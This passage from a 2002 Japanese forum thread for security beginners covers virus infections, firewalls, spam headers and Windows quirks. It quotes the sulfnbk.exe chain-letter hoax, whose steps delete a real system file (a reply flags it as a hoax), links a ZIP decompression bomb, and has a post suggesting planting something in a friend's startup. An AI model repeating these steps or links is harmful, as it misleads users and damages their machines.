722 :名無しさん@お腹いっぱい。:02/01/05 22:43
会社のパソコンにウィルスメールが来ました。
サーバーで検知されて毒ファイルはすでに削除されていたので、
問題はないのですが(トロイでした。)、
送信元のメールアドレスに心当たりはなく、
送信者名もただ「X」のみとゆう、あやしいものでした。

これって、もしかして故意にウィルスを送りつけられたのでしょうか?
サブジェクトは文字化けしていたので、なんと書いてあったのかわかりません。

723 :名無しさん@お腹いっぱい。:02/01/05 22:45
セキュリティを考えてないBBSで
一般にIPを公開していないとして
IPを抜く方法はありますか?

724 :名無しさん@お腹いっぱい。:02/01/05 22:47
>>723
あなたの立場次第では出来ます。

725 :名無しさん@お腹いっぱい。:02/01/05 22:48
>>723
CGIを勉強すれば?

726 :名無しさん@お腹いっぱい。:02/01/05 22:48
立場って言うのは管理人って事でしょうか?

またそれを防ぐにはどうすればいいんでしょう?

727 :名無しさん@お腹いっぱい。:02/01/05 22:54
>>726

ネットにアクセスしない書き込みしない。

−−−−−解決です−−−−

728 :名無しさん@お腹いっぱい。:02/01/05 22:54
>>726
プロクシを使えばよいと思います。
IPというのは、全く本当に簡単にとれますから。

729 :名無しさん@お腹いっぱい。:02/01/05 22:56
$REMOTE_HOST = $ENV{'REMOTE_HOST'};
$REMOTE_ADDR = $ENV{'REMOTE_ADDR'};
if ($REMOTE_HOST eq '') { $REMOTE_HOST = $REMOTE_ADDR; }
if ($REMOTE_HOST eq $REMOTE_ADDR) { $REMOTE_HOST = gethostbyaddr(pack('C4',split(/\./,$REMOTE_HOST)),2) || $REMOTE_ADDR; }

この程度です。

730 :名無しさん@お腹いっぱい。:02/01/05 23:00
たぶん
>>723 の言ってるのは
セキュリティを考慮してないBBSの書き込みから、
管理人でない第三者がIPを抜く方法だと思われ。

ログが丸見えなBBSも中にはあるからね〜(笑

731 :名無しさん@お腹いっぱい。:02/01/05 23:02


732 : :02/01/05 23:52
>>726
管理者側からの防御策ってことだったら
Web版に行ったほうが良いんじゃない?

733 :名無しさん@お腹いっぱい。:02/01/06 01:19
オススメのファイアーウォールはなんですか?
教えてください。
ちなみにうちはブラックアイスです。

734 :名無しさん@お腹いっぱい。:02/01/06 01:34
>>733
ブラックアイスはファイヤーウォールではございません。

735 :名無しさん@お腹いっぱい。:02/01/06 01:49
>734
じゃ、なんですか?

736 :名無しさん@お腹いっぱい。:02/01/06 02:02
>>735
エコアイスの親戚です

737 :名無しさん@お腹いっぱい。:02/01/06 03:49
>>722
文字化けしたメールの修復
ttp://www.kanzaki.com/docs/jis-recover.html

738 :名無しさん@お腹いっぱい。:02/01/06 12:44
>736
ハァ?

739 :@素人:02/01/06 13:51
録画機能が付いてないノートPCなのに
モニター越しに他人から覗かれる、なんていうウイルスって
あるのでしょうか?
とあるチャットをロムってたら
私の表情の変化をチャットの中の人が
まるでさも見てるかのように発言してるのを見て怖くなりました。
こういうウイルスってあるのでしょうか。

740 :名無しさん@お腹いっぱい。:02/01/06 14:28
>>739 心理学

741 :名無しさん@お腹いっぱい。:02/01/06 16:08
>>739
ナノテクノロジーによる極小チップが
あなたの体内に埋め込まれています。
あなたの体温、血圧、心拍数、発汗状態
などが監視されています。

742 ::02/01/06 16:24
ファイアーウォールを二つ以上かませるのって意味ないですよね?
自慢してる人がいたんですが。
自分はNortonなんですがBlack IceやTinyのTrojan Trapとの併用も
無意味ですか?

743 :名無しさん@お腹いっぱい。:02/01/06 17:07
同じパソコンにFWを2つ3つ入れても意味ないけど
別のパソコンなら意味ある。
FWとIDSとTrojan Trapの組み合わせは意味ある。

744 :742:02/01/06 19:29
IDSってのはBlackICE Defender for Serverのことですか?
個人のパソコンには必要なし?

745 :エコアイス≠東京電力:02/01/06 20:12
第三者中継可能?
Received: from mta05-svc.ntlworld.com (62.253.162.45) by *** with SMTP; 00 *** (JST)
Received: from lkgu78guoi ([62.255.154.129]) by mta05-svc.ntlworld.com (InterMail vM.4.01.03.23 201-229-121-123-20010418) with SMTP id <30011332240161.MANKO.mta05-svc.ntlworld.com@vkhyify67tdt>; *** +0000
Date:*** From: realwealth@maxleft.com
Message-ID:< 30011332240161.MANKO@mta05-svc.ntlworld.com >
Subject:It's time to STOP just making ends meet!!
-----
ELIMINATE DEBT--(credit cards,car loans, home loans,school loans)
CREATE WEALTH--With IMMEDIATE, EXTRODINARY & RESIDUAL income!
PROTECT ASSETS--Build & preserve a financial foundation!
Would you investigate it??
If you think it's "too good to be true" let me say this....
"A Wise Man Will Investigate What A Fool Takes For Granted!"
and "Timing Beats Out Talent Each and Every Time!"
For INSIDER INFORMATION:
email realwealthin2002@yahoo.com
Name: Email: Country:
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to realwealth@maxleft.com ...Thanks
http://www.em5000.com/unsub.php?client=thebvg&email=realwealthin2002@yahoo.com
http://www.em5000.com/unsub.php?client=thebvg&email=realwealthin2002@yahoo.com
-----
mta05-svc.ntlworld.com
<<< 220 mta05-svc@ntlworld.com ESMTP server (InterMail vM.4.01.03.23 201-229-121-123-20010418) ready ***
>>> HELO rlytest.nanet.co.jp
<<< 250 mta05-svc@ntlworld.com
>>> MAIL FROM:<"TEST http://www.nanet.co.jp/rlytest/ requested from pc1-cowc2-0-cust129rencable-ntl-com@mta05-svc.ntlworld.com >
<<< 250 Sender <"TEST http://www.nanet.co.jp/rlytest/ requested from pc1-cowc2-0-cust129-ren-cable-ntl-com@mta05-svc.ntlworld.com > Ok
>>> RCPT TO:<rlytest@nanet.co.jp>
<<< 550 relaying mail to nanet.co.jp is not allowed

netmongol.com (pri=10) (maxleft.com)
<<< 220 X1 NT-ESMTP Server NetMongol.com (IMail 6.06 66407-6)
>>> HELO rlytest.nanet.co.jp
<<< 250 hello NetMongol.com
>>> MAIL FROM:<"TEST http://www.nanet.co.jp/rlytest/ requested from realwealth-maxleft-com@netmongol.com
<<< 501 unacceptable mail address

746 :名無しさん@お腹いっぱい。:02/01/06 20:22
>>744
>IDSってのはBlackICE Defender for Serverのことですか?
for Workstation も IDSよ。。。
IDSというのは「外部からの不正侵入」に的を絞った製品。
ファイヤーウォール機能らしきものが付いてるが、
本来の意味と違ってる。
BlackICEの特有のことについては
専用スレのこのあたり↓を見てくれ(自分はこのスレの670)
http://pc.2ch.net/test/read.cgi/sec/992171869/669-679n

747 :名無しさん@お腹いっぱい。:02/01/06 22:07
HAPPY00.EXE, HAPPY99.EXE, TROJ_SKA, W32/SKA
に感染しました。A006143.CPYにWORM_SKA.Aというウィルス
にやられてます。ウィルスバスターで発見できるのですが
駆除、隔離、削除ができないし該当のファイルも検索しても探せません。
どうしたらいいのですか?

748 :名無しさん@お腹いっぱい。:02/01/06 22:11
Win Me と見た!
システムの復元を一度無効にして、再度有効にせよ。
さすれば、そのファイルも消えるだろう。

やり方は Windows FAQ だ。

749 :名無しさん@お腹いっぱい。:02/01/06 22:12
>>748>>747 へのレスじゃ

750 :名無しさん@お腹いっぱい。:02/01/06 22:34
>>748
神様!教えに従い実行すると、あら不思議!消えました。
復元オフにしたことでメモリーされていた、ファイルが聞けたんですね。
CPYとは形のないファイルみたいなものなんですか?
ウィルスチェックでも発見されなくなり無事削除成功?
安心していいんですよね?
ど〜もありがとう。

751 :名無しさん@お腹いっぱい。:02/01/06 22:37
×聞けた
○消えた
鬱だ・・・氏のう逝って来ます。

752 :名無しさん@お腹いっぱい。:02/01/06 22:53
IDS (Intrusion Detection System) 侵入検知システムだな。
情報系に進学したいなら勉強しとけ、その他は学校の宿題でも終わらせとけ。
www.sfc.keio.ac.jp/~keiji/backup/ids/indexj.html

753 :名無しさん@お腹いっぱい。:02/01/06 23:18
友人に勧められ、BackOrificeを使ってノートからデスクトップを操作することになったのですが、
不安に思いウイルススキャンをしてみたら案の定ひっかかりました。
これは悪用されるとヤバイ、ということは知っていたのですが、
まだセットアップもしていないのにウイルスとして検知されてしまうのでしょうか?

754 :名無しさん@お腹いっぱい。:02/01/07 07:00
>>753
はぁ? あの…BackOrificeって
たしかにリモート操作のツールではあるけど
超有名な「トロイの木馬」でもあるって知ってるよね?
検出しないウイルススキャンってあったら恐いような…。

ん? 質問の意図が違うのか? ん? お?…ネタかな?

755 :すず:02/01/07 10:45
正月明け早々困ってます…
出勤してPC立ち上げてネットにつないだら、プレインストールの
マカフィーに「JS/kak@M」がひっかかりました。
駆除成功と出るのに、何度も何度も検出します。
これは駆除できてないな〜と思って、定義ファイルなど更新して
みようと思ったのですが、できなくて、マカフィーのHPでは
製品版を買いなさい、といわれました。
むかついたので、ウィルスバスター2002の体験版を
ダウンロードしてみたら、ウイルスが検出されなく
なっちゃったのですが…
これってどういうことでしょう?どうしたらいい?優しく教えて〜

756 :擬人44:02/01/07 10:52
それについてはコレがいいかと。
http://www.puchiwara.com/hacking/

757 :名無しさん@お腹いっぱい。:02/01/07 11:05
>>755
マカフィーアンインストールしましたか?
ウイルスバスターもアンインストールして、もう一度
インストールし直しましょう

758 :すず:02/01/07 11:18
マカフィーは、コンパネの、アプリケーションの追加と削除で
アンインストールしてからいれました。
ウイルスバスター2002、入れなおしもやってみたのですが、
状況は変わりません。ただし、かわりにマカフィーの時は
検出できなかったX97M_LAROUX.Aウイルスを検出・駆除した
とゆってます。JS/kak@Mは一体どこへ…

759 :@素人:02/01/07 12:23
名無し@お腹いっぱい。さんレスありがとうございました。
確かに私がウイルスに犯されてるらしい・・・
でも、PC起動したとき最初文字が出るじゃないですか。
その最初に(メーカー名)Video Bios・・・・って出るんですが
それって別に気にしなくてもいいのでしょうか。
なんでVideoなんだろうか・・・
全く素人すぎてすみません。。

760 :@素人:02/01/07 12:25
すみません。名無しさん@お腹いっぱい。さんでした。名前間違って
申し訳ありませんm(__)m

761 :名無しさん@お腹いっぱい。:02/01/07 13:07
>>759
それは単にビデオカードの種類を表示してるだけでしょ

あと体験版じゃなくてちゃんと製品版買ってこいよ

762 :名無しさん@お腹いっぱい。:02/01/07 16:49
>>737
ありがとうございました。早速文字化けしたタイトルを調べてみたのですが、
残念ながらどのタイプにも当てはまらないようで、なんと書いてあるかは
分かりませんでした。しかし、どうせロクなことではないと思うので、
分からなくて良かったのかもしれません。
(ちなみにこんな感じで化けてました→「subject:Re: 裙フクンウワヨ」)
お手数をお掛けしてすみません。有り難うございました。

763 :たっきー:02/01/07 22:35
ハッカーです。
なんでも俺に聞きな、ヴぉけ!!

764 :ひつもん!!:02/01/07 22:43
>>763
チンポは何センチれすか??

765 :(^^)&rlo;)^^(:02/01/07 22:47


766 :(^^)&rlo;)^^(:02/01/07 23:00
>>765
どうやったのら〜〜〜?????日付逆なのら。。。

767 :(ΩφΩ)&rlo;)ΩφΩ(:02/01/07 23:03
>>765
ありゃりゃ???
でけたのら〜〜〜〜サンクスコ

768 :へー&rlo;:02/01/07 23:10
そんなこと出来るんだ

769 :ほー &rlo;:02/01/07 23:15
そうなんだ。

770 :(x x)&rlo;)x x(:02/01/07 23:18
そ、そういう事ら。。。

771 :&rlo;:02/01/07 23:23
これは?

772 :&rlo;:02/01/07 23:29
前からなの??

773 :&rlo; これはおもしろい:02/01/07 23:32
いや後ろから読む。

774 :名無しさん@お腹いっぱい。:02/01/07 23:58


くだらんテストはロビーでやれよ 厨房どもが
質問者と回答者に迷惑だ

775 ::02/01/08 03:05
IPが211から始まるのってどこの国ですか?
スキャン等かけてくるんですが。

776 :名無しさん@お腹いっぱい。:02/01/08 03:10
>>762
たぶん韓国からの spamだと思われ。
ドメインかキャラクターセットに“ .kr” という文字があるんじゃない?
いずれにしてもわけのわからんメールは即削除あるよろし。

777 :名無しさん@お腹いっぱい。:02/01/08 03:40
リンク追加希望

スパイウエア発見専用ソフト「Ad-aware」
http://pc.2ch.net/test/read.cgi/sec/1003749900/l50

778 :名無しさん@お腹いっぱい。:02/01/08 03:42
Agnitum Outpost
http://pc.2ch.net/test/read.cgi/sec/997301454/l50

779 :名無しさん@お腹いっぱい。:02/01/08 03:46
W32.Badtransと思われる添付ファイル付きのメールが来ました。
自分はフリーメールでdionのアドレスの相手先に送ったメール
の返信がその問題のメールでした。

ファイルの名前は「NUDE_ME.MP3.scr」で38KBだったと思います。
これって相手が意図的に送ったものだと思えないのですが。

780 :名無しさん@お腹いっぱい。:02/01/08 03:53
http://www.agnitum.com/download/outpostfree.html

781 :名無しさん@お腹いっぱい。:02/01/08 03:57
>>777
http://www.lavasoft.de/downloads.html

782 :名無しさん@お腹いっぱい。:02/01/08 08:22
>>779
そうだよ 意図的に送ったものとは限らないよ

783 :はははは:02/01/08 11:48
http://www.puchiwara.com/hacking/
コレなんかかなり面白いかと。

784 :@素人:02/01/08 12:10
761でのお返事ありがとうございました
体験版だったとは・・・・
知人から譲り受けたPCだったもので
そうだとは知りませんでした

785 :名無しさん@お腹いっぱい。:02/01/08 12:13
>643氏

遅レスすみません。
この板のどこかのスレにリンクがあったので飛んでいっただけです。
よって正式名称も何も覚えていないという始末・・・ちょっと首吊ってきます。
とにかくスタートアップを止めたいなら、このスレの475を参照して下さい。

・・・おわかりになる方、(できればリンク先も添えて)教えて差し上げて下せえ・・・ m(__)m

786 :名無しさん@お腹いっぱい。:02/01/08 12:28
Badtransばら撒いた知人から賀状が着たんだけど、
対策法がわからずにPCが放置状態になってるそうな。
忙しいとかもっともらしい理由を書いてはいたんだが、
これからは手紙は郵便で送るって。
お前はもうPC触るなって返事を書きたくなる。

787 :名無しさん@お腹いっぱい。:02/01/08 12:32
>>786
そいつのPCのマザーボードを叩き割ってこい(w

788 :(゚д゚)ウマー&rlo;ーマウ(゚д゚):02/01/08 14:02
>>786
そいつのスタートアップにこれ入れとけ
http://live.2ch.net/test/read.cgi/festival/1008852023/74

789 :新mac板から来ました:02/01/08 16:48
778 名前:**新mac板から来ました 投稿日:02/01/08 13:09
**新mac板から来ました。後輩がウィンドウズのことで問い合わせを
して来たんですが、winのことは良く分からないので、寄らせて
もらいました。代理質問です。

vaio PCVMX2
windows 98

カーネル32とかいうウイルスに感染したとかで、
その後輩の知り合いに頼んで初期化インストールを試みたそうなんですが、
起動時に
F1がF2を押して下さいとかいう警告がでる との事。
それを押すと普通に立ち上がるそうなんですが、買った時の
状態ではないすよね。

初期化してそれならば、ファームウエア関係かなとも思うんですが、
なにかアドバイスいただければと思います。

スレ違いかも知れませんが、よろしくお願いします。

これ、昨日初心者板で質問したんだけど、解決できなくて。
こっちで聞いてみようと思いました。
ちなみに、本人曰く、リカバリCDで初期化インストールしたそうです。


785 名前:名無し~3.EXE メェル:sage 投稿日:02/01/08 16:08
>>778
それはたぶん、W32.Badtrans.B@mmだな。
セキュ板行けば解決方法見つかるだろ。

------------------
お邪魔します。当方マックユーザなのであまり詳しい事はわかりませんが、なんとか後輩の
力になってやりたくて書き込みました。アドバイス頂けると助かります。長文スマソ

790 :名無しさん@お腹いっぱい。:02/01/08 17:36
>>789
仮にそれが Badtrans.B ならば
初期化リカバリーした時点で駆除完了。

>起動時に F1がF2を押して下さいとかいう警告がでる との事。
だから、これは原因が別にあるはずで、
そもそも、購入時の状態と違うのかどうかもこの文面ではわからん。

791 :新mac板から来ました:02/01/08 19:21
>>789

う〜ん、うまく説明できなくて恐縮ですが、
普通にwin98が立ち上がる前にF1またはF2を押して下さいって
出るらしいんですよ。

macだと、PRAMクリア、パワーマネージャーのリセット、
ファーストエイドなどの修復アプリ実行、ファームウエアのアップデート、など、いろいろやってみる事があるんだけど、
winわかんなくって..

もう一度リカバリ再インストールするように言ってみようかな

792 :643:02/01/08 20:01
>785
情報ありがとうございます。
うちのは噂に聞くwininits.exeではない(見つからない)ようですが、
ほとんど同じ症状。起動直後にAドライブへアクセス、txt、html、gif、
アドレス帳が次々と消えてゆく、という感じ。ノートンでは発見できず。
リカバーしても同じだったから、結構まえからシステムに感染してたのか、
パーティション分けて作ってたDドライブにまだ居るみたいです。
とにかく所在と正体が分からないんで、不安…。せめてスタートアップを
監視するか精密なログを取ってくれるソフトは無いかな、と思った次第。
海外のソフトなんでしょうか? もうちっと探してみます!

793 :名無しさん@お腹いっぱい。:02/01/08 20:02
>>791
CMOSの内容が不正なまま起動するとそんな表示が出る機種もあるけど
それだとメーカー機種特有の現象なので、これ以上は板違い。

然るべきWindows関連板で、機種名とOS等詳しく書いて訊くべし。
(なんとなくCMOS-RAMクリアだけで直りそうだが…)

794 :ナナシサソ:02/01/08 20:27
ノートンインターネットセキュリティーファイアウォールのログに進入された形跡がありました
これはカンコック野郎に攻撃されたってことですよね?
% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)
inetnum: 211.226.0.0 - 211.231.255.255
netname: KORNET
descr: KOREA TELECOM
descr: KOREA TELECOM Internet Operating Center
country: KR
admin-c: DL276-AP
tech-c: WK81-AP
remarks: ******************************************
remarks: Allocated to KRNIC Member.
remarks: If you would like to find assignment
remarks: information in detail please refer to
remarks: the KRNIC Whois Database at:
remarks: http://whois.nic.or.kr/english/index.html
remarks: ******************************************
mnt-by: MNT-KRNIC-AP
mnt-lower: MNT-KRNIC-AP
changed: hostmaster@apnic.net 20001212
changed: hostmaster@apnic.net 20010627
source: APNIC

person: Dongjoo Lee
address: Korea Telecom
address: 128-9 Youngundong Chongroku
address: SEOUL
address: 463-711
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: ip@ns.kornet.net
nic-hdl: DL276-AP
mnt-by: MNT-KRNIC-AP
changed: hostmaster@nic.or.kr 20010523
source: APNIC
person: Won Kang
address: Korea Telecom
address: 128-9 Youngundong Chongroku
address: SEOUL
address: 463-711
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: ip@ns.kornet.net
nic-hdl: WK81-AP
mnt-by: MNT-KRNIC-AP
changed: hostmaster@nic.or.kr 20010523
source: APNIC

inetnum: 211.227.229.0 - 211.227.231.255
netname: KORNET-XDSL-MOKPO-KR
descr: MOKPO NODE
descr: 980 OKAMDONG MOKPOSI
descr: CHONNAM
descr: 530-420
country: KR
admin-c: GP1572-KR
tech-c: WK5137-KR

795 :名無しさん@お腹いっぱい。:02/01/08 20:38
インターネット接続環境がYBBなんですが、
ZoneAlarmでローカルPCからのアクセスが防げません。

(゚∀゚)アヒャ

796 :(^^)&rlo;)^^(:02/01/08 21:53
twest

797 :初心者。:02/01/09 04:02
どこかの板に直リンクしてあったアドを踏んだら、
クッキーを抜かれたらしく
PCを立ち上げると、「MS−DOSプロンプト」が立ち上がり
「指定されたCOMMAND検索ディレクトリが違います」って出るんですけど
どうすれば直るのでしょうか?どなたか教えてください。

798 :名無しさん@お腹いっぱい。:02/01/09 04:21
>>797

>>3

799 :初心者。:02/01/09 04:45
>>798
失礼しました。
3のどこに行けばよいのでしょうか・・・。
すいませんがまたお願いします。

800 :名無しさん@お腹いっぱい。:02/01/09 05:06
>>799
あなたは名前欄になんて入力したの?(w

801 :助けて:02/01/09 10:03
みみずんの過去ログ持ってる人
諸費用込みで5Kで譲ってください

前回、前々回と、どうしても買えない状況にあったし
こんかい、みみずんからCDはもう焼かない宣言出たので
困り果ててます

激しくスレ違いだけど許して

802 :すみれ博士:02/01/09 11:52
ADSLモデムにブロードバンドルーターを繋いで使ってるんですが、アクセス履歴やPing等をログとして記録したいです、
ルーターのグローバル側にログを記録するPCをダムハブで接続すれば可能でしょうか?

803 :名無しさん@お腹いっぱい。:02/01/09 15:17
今日、一通のメールが届きました。
メール内容は、ウィルスに感染してアドレス帳に入っているすべての人にそのウイルスを送っている可能性があるので、即除去してくださいと言うものでした。
このウィルスは、14日間潜んでその後Cドライブを破壊してしまうそうです。
下記の手順でウィルスのチェック及び除去をお願い致します。

手順
1.“スタート” → “検索” → “ファイルやフォルダー”をクリック。
2.“名前”の欄に “sulfnbk.exe” とタイプ。 ← これがウィルス
3.“探す場所”の欄に “C” ドライブが選択されている事を確認。
4.“検索開始” クリック。
5. もしファイルが見つかれば、絶対に開かないこと!
6. そのファイルを右クリックして、“削除”を左クリック。
7.'sulfnbk.exe'をごみ箱に移してもよろしいですか?の質問に対して “はい”をクリック。
8. デスクトップの “Recycle Bin” をダブルクリックし、“sulfnbk.exe” を削除 するか、“ごみ箱を空にする”をクリック。

もしこのウィルスがCドライブに見つかった方は、アドレス帳に入っている人全員に 同じ内容の メールをしてください。

804 :名無しさん@お腹いっぱい。:02/01/09 15:49
>>803
有名なチェーンメールですね。

基本的な事なんですが、
>アドレス帳に入っている人全員に 同じ内容の メールをしてください。
こんな事が書いてあるメールは信用しちゃダメです。

805 :これブラクラですか?:02/01/09 17:40
さっきこのZIPをDLして解凍したら、400MB以上のBMPに化けてパソコンが固まりました。(TT)
これってわざとやってる嫌がらせでしょうか?
スキルのある方、もしよければ教えてください

ttp://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h8651.zip

806 :名無しさん@お腹いっぱい。:02/01/09 17:49
>>805
そもそも、なんで400MBもあるBMPを、わざわざ表示しようとするの?
あなたのパソコンにはメモリはどれだけ搭載されてるの?
それで、表示できると思いましたか?

807 :名無しさん@お腹いっぱい。:02/01/09 17:54




>>805
ZIP感染型ウイルス。

808 :名無しさん@お腹いっぱい。:02/01/09 17:55
500 名前:これってブラクラ? 投稿日:02/01/09 17:51 ID:???
セキュリティ板でもきいたのですがアホらしいのか誰も答えてくれませんでした...。
さっきこのZIPをDLして解凍したら、400MB以上のBMPに化けてパソコンが固まりました。(TT)
これってわざとやってる嫌がらせでしょうか?
それとも私がDL手順を間違えた?
スキルのある方、もしよければ教えてください

ttp://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h8651.zip


501 名前:虎 投稿日:02/01/09 17:52 ID:???
>>500
有名な奴
単色の巨大なBMPファイルは、異様に圧縮効率が良いのだ。

809 :805:02/01/09 17:57
>>806
レスありがとうございます。
わざわざ表示しようとした...というか、解凍する時点でいつもと違ってやたら時間がかかり、固まったかんじです。
で、あとで確かめたら400MBとか書いてあったという始末で。
もとのZIPは400KBくらいでまさかそんなでかくなるとも思わなかったし...。

810 :464:02/01/09 18:01
>792氏

782 :名無しさん@お腹いっぱい。 :02/01/09 10:51
>>769
"StartStop"ね。ググルで検索すれば一発で見つかるよ。

とのことでしたので調べてみたところ、ありました。
http://www.tfi-technology.com/startstop.htm

811 :809:02/01/09 18:03
>>807
さきほど初級ネット板でも教えていただきました。ありがとうございます。

>>808
入れ違いで書き込みになってすいません。解決しました。
お騒がせしてすいませんでした。

812 :名無しさん@お腹いっぱい。:02/01/09 19:13
ATT00002.txt
って添付ファイルがついたウィルスくさいメールが送られて来たんですけど。(汗)
開けたら「ダウンロードしますか?」みたいなダイアログでたんで「いいえ」選択したんだけど、
大丈夫ですかね?

813 :792:02/01/09 19:47
>464
感謝!「and」がいらなかったんですね…

814 :名無しさん@お腹いっぱい。:02/01/09 20:47
ADSLモデムのランプが点滅していたので何だろうと思って、
ノートンインターネットセキュリティのイベントログを見てみると
http://windowsupdate.microsoft.com/ident.cab
に何度もアクセスしているようなんです。
しばらくすると止まりましたが、
イベントログのweb履歴に同じようなのが大量に記録に残ってます。
これって何なんでしょうか?

815 :名無しさん@お腹いっぱい。:02/01/09 20:49
>>812
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_BADTRANS.B

プレビューしちまったのかい?

816 :名無しさん@お腹いっぱい。:02/01/09 21:03
>815
あ、やっぱりバッドトランスですかね?
駆除ツール落としてきたけど「感染していません」ってでたもんで。(w;

817 :これてウイルスなんでしょうか??:02/01/09 21:36
ある日気づくとウインドウの左上の「閉じる」や「最大化」や「最小化」などが
数字になっていました。0とか2とか。
また、いろんなダイアログボックス?のチェックボックスも変な記号に
変ってしまいました。
仕事に使っていて特に困ることもないんですが、なんか不気味です。。
それとチェックボックスは変な記号のせいで、チェックが入ってるのかどうか
わからないときもあります。。

友達に話すとトロイなんじゃないのって言われたんですが。。

ちなみにトレンドマイクロ社のオンラインウイルス検索
してみたんですが何もひっかかりませんでした。

何かご存知の方お教えください!
よろしくお願いします!

818 :817です:02/01/09 21:38
すみません、ウインドウの右上でした。

819 :名無しさん@お腹いっぱい。:02/01/09 21:40
>>817
Win98か?
起動ドライブ\windows内のttfcache捨ててリブートすれ。
別に危ないもんじゃない。仕様だ仕様(笑

820 :817です:02/01/09 22:23
819さんありがとうございます!

Win98です。
なぜかttcache というのが見つかりません。
これも検索してみたんですが。。

でもとりあえずウイルスじゃなくてよかったですー。

821 :ななし:02/01/09 22:35
>820
見つからない場合は、ここ読む。
ttp://homepage2.nifty.com/winfaq/fontstrouble.html

822 :通行人:02/01/09 22:36
>>820
ttcacheは隠しファイルだから、マイコンピュータ→表示→フォルダオプション
→詳細設定で「すべてのファイルを表示する」にチェックをする。
それから削除しれ。

823 :通行人:02/01/09 22:37
かぶっちゃったね。スマソ。

824 :819:02/01/09 22:37
>>817
ttcacheでなくttfcacheだぞ。
ようはこれ↓
ttp://homepage2.nifty.com/winfaq/fontstrouble.html

825 :819:02/01/09 22:39
がいーん
漏れもカブッタ

826 :名無しさん:02/01/09 23:18
知らない間に起動ドライブの\TEMPにTEMPVT.EXEというファイル(28672バイト)が
できていたのですが、何物なんでしょうか。

827 :817です:02/01/09 23:29
はっっ!ほんとだ、f が抜けてた、、

直りました〜!よかった。。
みなさんほんとにありがとうございましたー!

828 :名無しさん@お腹いっぱい。:02/01/09 23:42
>>825
ぴんぽーん!カブって正解だ。

829 :821:02/01/09 23:44
不正解だった

830 :名無しさん@お腹いっぱい。:02/01/09 23:47
NISが入ってるPCにpingを打っても弾かれて、MSのホームネットワークが繋がらないんだけど
何を許可してあげたらいいのか教えてください。

831 :初心者:02/01/10 00:09
ADSLにして、不安なのでとりあえずゾーン・アラーム入れました。v2.6です。
で、シマンテックのセキュリティチェックしてみると、ほかはすべてステルスなんですが、
「ブラウザのプライバシースキャン」の項目が「要注意」でした。
解決するには
・個人用のファイアウォールのインスト。
・ファイアウォールのインストをしてある場合、個人情報を保護する設定が正しくないか、サポート外の可能性がある。
と出ました。
OSはWinXPで、OSについてるファイアーウォールは有効にしてありますが、それではダメだと言われてるんでしょうか。
やっぱり有償のファイアーウォールを入れた方がいいんでしょうか。
webの参照履歴がwebサイトに流出するリスクがあると脅かされましたが、それってヤバイことなんでしょうか。
宜しくお願いします。

832 :名無しさん@お腹いっぱい。:02/01/10 00:15
>>831
べつにいいんじゃないの?

833 :名無しさん@お腹いっぱい。:02/01/10 00:21
>>831
そんなのほっとけ。リンク元ぐらい知れたって困らない。
どうしても困るなら、URLコピぺで貼りつけて直接飛べ。

834 :初心者:02/01/10 00:21
え、いいとは・・・?
まあ参照履歴が見られてもいいと言えばいいんですけど。
ひょっとしてそこから派生するトラブルとかもあるのかなあと、ちょっとビビリまして。
とりあえず、レスありがとうございます。

835 :初心者:02/01/10 00:24
>>832
>>833
ありがとうございます。困ることはないんですが、赤い文字で注意されて初心者なりにビビリました(w
ルーター入れるか、有償ソフト買うか考えるところでした(まああったに越したことはないんでしょうけど)
安心しました。ありがとうございます。

836 :名無しさん@お腹いっぱい。:02/01/10 00:28
>>835
要するに危機感煽って購買意欲わかせるのが目的の一つだからね。
それだけとはいわないし、イイソフトだとは思うけど。

837 :初心者:02/01/10 00:32
>>836
そうですよね。煽られてるんだろうなーとか思いながらも、常時接続にしたばっかりなんで、こっちは警戒心の固まりですから(w
購入等は、もうちょっと色々勉強してから考えてみます。
ありがとうございます。

838 :名無しさん@お腹いっぱい。:02/01/10 01:24
ローカルの恥ずかしい名前を知られるのはちょっと困る

839 :名無しさん@お腹いっぱい。:02/01/10 01:32
>>838
それってローカルにブックマークファイルを置いてる場合?
それ…アクセスできないけど。。。
自分サイトに自分用のブックマークを置いてる場合は困るかも?

840 :名無しさん@お腹いっぱい。:02/01/10 13:37
コンピュータ名のことだと思われ。

漏れは無難にsolar systems付けてます。

841 :名無しさん@お腹いっぱい。:02/01/11 10:19


842 :名無しさん@お腹いっぱい。:02/01/11 10:52
3,4年前は関係ないページをrefererとしてもらす場合があったが、今は直ってるのか?

843 :名無しさん@お腹いっぱい。:02/01/11 10:56
Linuxで使えるFreeのFirewallでお勧めありますか?
WindowsはNortonとTinyPFを使っています。

844 :名無しさん@お腹いっぱい。:02/01/11 13:16
>>842
お前が対策してれば直ってる

>>843
あるよ

845 :新生:02/01/12 01:18
ZONEALARM入れてるんですが、同じところから数分おきに何十回もマルチキャストとか
ブロックするのって、気にしなくていいんですか?なんで、同じところから来るんでしょう?
ちなみに今日だけだと思います。向こうもこっちもYBB。最後の数字だけが違います。
218.119.120.×

846 :_:02/01/12 04:13
ウイルスバスターOn-Line Scan
http://housecall.antivirus.com/housecall/start_jp.asp

の件で相談なのですが、
WinME で、トロイの木馬の検索プログラムの
DOSプロンプト画面が表示されないないのですが、
何が原因なんでしょうか?

847 :名無しさん@お腹いっぱい。:02/01/12 04:47
>>846
MeでDos使う時は起動ディスクからじゃないと使えないとかなんとか聞いたことがあるけど、
その関係かなぁ・・・。

848 : ◆Np/FxuF6 :02/01/12 04:58
2ちゃんねるでカキコする時に、本文に英文字を使うと
名前を入れてるのに『名前を入れて下さい』と、出るんですけど…
…動作も少し不安定なんで、ウィルスかと思うと戦々恐々です。

849 :名無しさん@お腹いっぱい。:02/01/12 05:29
>>848
 >>583
 >>628
 >>639

850 :名無しさん@お腹いっぱい。:02/01/12 08:23
ProxomitronってFWの役目を果たせるのでしょうか?

851 : :02/01/12 11:28
>848
NGワードを使っているんじゃないですか?
NGワードのガイドライン
http://ton.2ch.net/test/read.cgi/gline/1001964600/

>850
残念。無理。

852 :名無しさん@お腹いっぱい。:02/01/12 19:04
なぜか初質スレが落ちてる

853 :名無しさん@お腹いっぱい。:02/01/12 19:21
>>846
表示が後のほうに隠れてるか、
最小化で実行されてるんじゃない?

